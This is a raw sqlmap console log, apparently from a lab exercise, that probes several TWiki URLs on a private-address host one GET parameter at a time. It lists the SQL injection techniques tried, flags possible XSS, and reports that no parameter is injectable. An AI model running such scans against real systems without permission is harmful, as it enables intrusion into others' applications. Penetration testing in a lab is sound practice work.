[20:01:41] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiForms?skin=print' | |
[20:01:41] [INFO] testing connection to the target URL | |
[20:01:41] [INFO] testing if the target URL is stable | |
[20:01:42] [INFO] target URL is stable | |
[20:01:42] [INFO] testing if GET parameter 'skin' is dynamic | |
[20:01:42] [INFO] confirming that GET parameter 'skin' is dynamic | |
[20:01:42] [INFO] GET parameter 'skin' is dynamic | |
[20:01:43] [INFO] heuristics detected web page charset 'ascii' | |
[20:01:43] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable | |
[20:01:43] [INFO] testing for SQL injection on GET parameter 'skin' | |
[20:01:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:01:43] [WARNING] reflective value(s) found and filtering out | |
[20:01:44] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:01:44] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:01:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:01:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:01:46] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:01:47] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:01:47] [INFO] testing 'MySQL inline queries' | |
[20:01:47] [INFO] testing 'PostgreSQL inline queries' | |
[20:01:47] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:01:47] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:01:48] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:01:48] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:01:49] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:01:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:01:50] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:01:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:01:51] [INFO] testing 'Oracle AND time-based blind' | |
[20:01:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:01:52] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:01:58] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:02:05] [WARNING] GET parameter 'skin' is not injectable | |
[20:02:05] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 158: | |
GET http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiForms?rev1=1.17&rev2=1.16 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:02:05] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiForms?rev1=1.17&rev2=1.16' | |
[20:02:05] [INFO] testing connection to the target URL | |
[20:02:05] [INFO] testing if the target URL is stable | |
[20:02:06] [INFO] target URL is stable | |
[20:02:06] [INFO] testing if GET parameter 'rev1' is dynamic | |
[20:02:06] [WARNING] GET parameter 'rev1' does not appear dynamic | |
[20:02:06] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable | |
[20:02:07] [INFO] heuristic (XSS) test shows that GET parameter 'rev1' might be vulnerable to XSS attacks | |
[20:02:07] [INFO] testing for SQL injection on GET parameter 'rev1' | |
[20:02:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:02:07] [WARNING] reflective value(s) found and filtering out | |
[20:02:08] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:02:08] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:02:09] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:02:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:02:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:02:10] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:02:10] [INFO] testing 'MySQL inline queries' | |
[20:02:10] [INFO] testing 'PostgreSQL inline queries' | |
[20:02:11] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:02:11] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:02:11] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:02:12] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:02:12] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:02:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:02:13] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:02:14] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:02:14] [INFO] testing 'Oracle AND time-based blind' | |
[20:02:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:02:15] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:02:21] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:02:27] [WARNING] GET parameter 'rev1' is not injectable | |
[20:02:27] [INFO] testing if GET parameter 'rev2' is dynamic | |
[20:02:27] [INFO] confirming that GET parameter 'rev2' is dynamic | |
[20:02:27] [INFO] GET parameter 'rev2' is dynamic | |
[20:02:27] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable | |
[20:02:27] [INFO] heuristic (XSS) test shows that GET parameter 'rev2' might be vulnerable to XSS attacks | |
[20:02:27] [INFO] testing for SQL injection on GET parameter 'rev2' | |
[20:02:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:02:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:02:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:02:30] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:02:31] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:02:32] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:02:32] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:02:33] [INFO] testing 'MySQL inline queries' | |
[20:02:33] [INFO] testing 'PostgreSQL inline queries' | |
[20:02:34] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:02:34] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:02:35] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:02:35] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:02:36] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:02:36] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:02:37] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:02:37] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:02:38] [INFO] testing 'Oracle AND time-based blind' | |
[20:02:38] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:02:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:02:51] [WARNING] GET parameter 'rev2' is not injectable | |
[20:02:51] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 159: | |
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiForms?rev=1.16 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:02:51] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiForms?rev=1.16' | |
[20:02:51] [INFO] testing connection to the target URL | |
[20:02:52] [INFO] testing if the target URL is stable | |
[20:02:53] [INFO] target URL is stable | |
[20:02:53] [INFO] testing if GET parameter 'rev' is dynamic | |
[20:02:53] [WARNING] GET parameter 'rev' does not appear dynamic | |
[20:02:53] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable | |
[20:02:53] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks | |
[20:02:53] [INFO] testing for SQL injection on GET parameter 'rev' | |
[20:02:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:02:53] [WARNING] reflective value(s) found and filtering out | |
[20:02:55] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:02:55] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:02:55] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:02:56] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:02:57] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:02:57] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:02:57] [INFO] testing 'MySQL inline queries' | |
[20:02:57] [INFO] testing 'PostgreSQL inline queries' | |
[20:02:58] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:02:58] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:02:58] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:02:59] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:02:59] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:02:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:03:00] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:03:01] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:03:01] [INFO] testing 'Oracle AND time-based blind' | |
[20:03:02] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:03:02] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:03:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:03:16] [WARNING] GET parameter 'rev' is not injectable | |
[20:03:16] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[20:03:16] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiForms?rev1=1.16&rev2=1.15' | |
[20:03:16] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiForms?rev=1.15' | |
URL 160: | |
GET http://192.168.1.113:80/twiki/bin/oops/TWiki/TWikiForms?template=oopsmore¶m1=1.17¶m2=1.17 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:03:16] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/TWiki/TWikiForms?template=oopsmore¶m1=1.17¶m2=1.17' | |
[20:03:16] [INFO] testing connection to the target URL | |
[20:03:16] [INFO] testing if the target URL is stable | |
[20:03:17] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on | |
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C | |
[20:03:17] [INFO] testing if GET parameter 'template' is dynamic | |
[20:03:17] [INFO] confirming that GET parameter 'template' is dynamic | |
[20:03:17] [INFO] GET parameter 'template' is dynamic | |
[20:03:17] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable | |
[20:03:17] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks | |
[20:03:17] [INFO] testing for SQL injection on GET parameter 'template' | |
[20:03:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:03:17] [INFO] heuristics detected web page charset 'ascii' | |
[20:03:17] [WARNING] reflective value(s) found and filtering out | |
[20:03:18] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:03:18] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:03:19] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:03:19] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:03:20] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:03:20] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:03:20] [INFO] testing 'MySQL inline queries' | |
[20:03:20] [INFO] testing 'PostgreSQL inline queries' | |
[20:03:20] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:03:20] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:03:21] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:03:21] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:03:22] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:03:22] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:03:22] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:03:23] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:03:23] [INFO] testing 'Oracle AND time-based blind' | |
[20:03:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:03:24] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:03:28] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:03:33] [WARNING] GET parameter 'template' is not injectable | |
[20:03:33] [INFO] testing if GET parameter 'param1' is dynamic | |
[20:03:33] [WARNING] GET parameter 'param1' does not appear dynamic | |
[20:03:33] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable | |
[20:03:33] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks | |
[20:03:33] [INFO] testing for SQL injection on GET parameter 'param1' | |
[20:03:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:03:35] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:03:35] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:03:36] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:03:36] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:03:37] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:03:38] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:03:38] [INFO] testing 'MySQL inline queries' | |
[20:03:38] [INFO] testing 'PostgreSQL inline queries' | |
[20:03:38] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:03:38] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:03:39] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:03:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:03:40] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:03:40] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:03:41] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:03:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:03:42] [INFO] testing 'Oracle AND time-based blind' | |
[20:03:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:03:49] [INFO] target URL appears to be UNION injectable with 10 columns | |
[20:03:49] [WARNING] applying generic concatenation with double pipes ('||') | |
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y | |
[20:03:53] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') | |
[20:03:54] [INFO] testing 'MySQL UNION query (88) - 1 to 10 columns' | |
[20:04:02] [WARNING] GET parameter 'param1' is not injectable | |
[20:04:02] [INFO] testing if GET parameter 'param2' is dynamic | |
[20:04:02] [WARNING] GET parameter 'param2' does not appear dynamic | |
[20:04:02] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable | |
[20:04:02] [INFO] testing for SQL injection on GET parameter 'param2' | |
[20:04:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:04:04] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:04:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:04:04] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:04:05] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:04:06] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:04:06] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:04:07] [INFO] testing 'MySQL inline queries' | |
[20:04:07] [INFO] testing 'PostgreSQL inline queries' | |
[20:04:07] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:04:07] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:04:08] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:04:08] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:04:09] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:04:09] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:04:10] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:04:10] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:04:11] [INFO] testing 'Oracle AND time-based blind' | |
[20:04:11] [INFO] testing 'Generic UNION query (88) - 1 to 10 columns' | |
[20:04:19] [INFO] testing 'MySQL UNION query (88) - 1 to 10 columns' | |
[20:04:27] [WARNING] GET parameter 'param2' is not injectable | |
[20:04:27] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 161: | |
GET http://192.168.1.113:80/twiki/bin/rename/TWiki/TWikiForms?newweb=TWiki&newtopic=TWikiFormTemplate&confirm=on | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:04:27] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rename/TWiki/TWikiForms?newweb=TWiki&newtopic=TWikiFormTemplate&confirm=on' | |
[20:04:27] [INFO] testing connection to the target URL | |
sqlmap got a 302 redirect to 'http://192.168.1.113/twiki/bin/oops/TWiki/TWikiFormTemplate'. Do you want to follow? [Y/n] Y | |
[20:04:27] [INFO] testing if the target URL is stable | |
[20:04:28] [WARNING] GET parameter 'newweb' does not appear dynamic | |
[20:04:28] [INFO] heuristics detected web page charset 'ascii' | |
[20:04:28] [WARNING] heuristic (basic) test shows that GET parameter 'newweb' might not be injectable | |
[20:04:28] [INFO] testing for SQL injection on GET parameter 'newweb' | |
[20:04:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:04:28] [WARNING] reflective value(s) found and filtering out | |
[20:04:30] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:04:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:04:31] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:04:32] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:04:32] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:04:33] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:04:33] [INFO] testing 'MySQL inline queries' | |
[20:04:34] [INFO] testing 'PostgreSQL inline queries' | |
[20:04:34] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:04:34] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:04:35] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:04:35] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:04:36] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:04:36] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:04:37] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:04:38] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:04:39] [INFO] testing 'Oracle AND time-based blind' | |
[20:04:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:04:40] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:04:48] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:04:56] [WARNING] GET parameter 'newweb' is not injectable | |
[20:04:56] [WARNING] GET parameter 'newtopic' does not appear dynamic | |
[20:04:56] [WARNING] heuristic (basic) test shows that GET parameter 'newtopic' might not be injectable | |
[20:04:56] [INFO] testing for SQL injection on GET parameter 'newtopic' | |
[20:04:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:04:58] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:04:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:05:00] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:05:01] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:05:02] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:05:03] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:05:03] [INFO] testing 'MySQL inline queries' | |
[20:05:03] [INFO] testing 'PostgreSQL inline queries' | |
[20:05:04] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:05:04] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:05:05] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:05:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:05:06] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:05:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:05:08] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:05:09] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:05:10] [INFO] testing 'Oracle AND time-based blind' | |
[20:05:11] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:05:13] [INFO] target URL appears to be UNION injectable with 10 columns | |
[20:05:13] [WARNING] applying generic concatenation with double pipes ('||') | |
[20:05:14] [INFO] GET parameter 'newtopic' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable | |
[20:05:14] [INFO] checking if the injection point on GET parameter 'newtopic' is a false positive | |
[20:05:14] [WARNING] false positive or unexploitable injection point detected | |
[20:05:14] [WARNING] GET parameter 'newtopic' is not injectable | |
[20:05:14] [WARNING] GET parameter 'confirm' does not appear dynamic | |
[20:05:14] [WARNING] heuristic (basic) test shows that GET parameter 'confirm' might not be injectable | |
[20:05:14] [INFO] testing for SQL injection on GET parameter 'confirm' | |
[20:05:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:05:16] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:05:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:05:17] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:05:18] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:05:19] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:05:20] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:05:20] [INFO] testing 'MySQL inline queries' | |
[20:05:20] [INFO] testing 'PostgreSQL inline queries' | |
[20:05:20] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:05:20] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:05:21] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:05:22] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:05:23] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:05:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:05:24] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:05:25] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:05:26] [INFO] testing 'Oracle AND time-based blind' | |
[20:05:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:05:37] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:05:47] [WARNING] GET parameter 'confirm' is not injectable | |
[20:05:47] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[20:05:47] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=login.php' | |
URL 162: | |
GET http://192.168.1.113:80/twiki/bin/edit/Know/WebPreferences?t=1441457596 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:05:47] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Know/WebPreferences?t=1441457596' | |
[20:05:47] [INFO] testing connection to the target URL | |
[20:05:47] [INFO] testing if the target URL is stable | |
[20:05:48] [INFO] target URL is stable | |
[20:05:48] [INFO] testing if GET parameter 't' is dynamic | |
[20:05:48] [WARNING] GET parameter 't' does not appear dynamic | |
[20:05:48] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable | |
[20:05:48] [INFO] testing for SQL injection on GET parameter 't' | |
[20:05:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:05:49] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:05:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:05:50] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:05:50] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:05:51] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:05:51] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:05:51] [INFO] testing 'MySQL inline queries' | |
[20:05:51] [INFO] testing 'PostgreSQL inline queries' | |
[20:05:52] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:05:52] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:05:52] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:05:53] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:05:53] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:05:53] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:05:54] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:05:54] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:05:55] [INFO] testing 'Oracle AND time-based blind' | |
[20:05:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:05:55] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:06:01] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
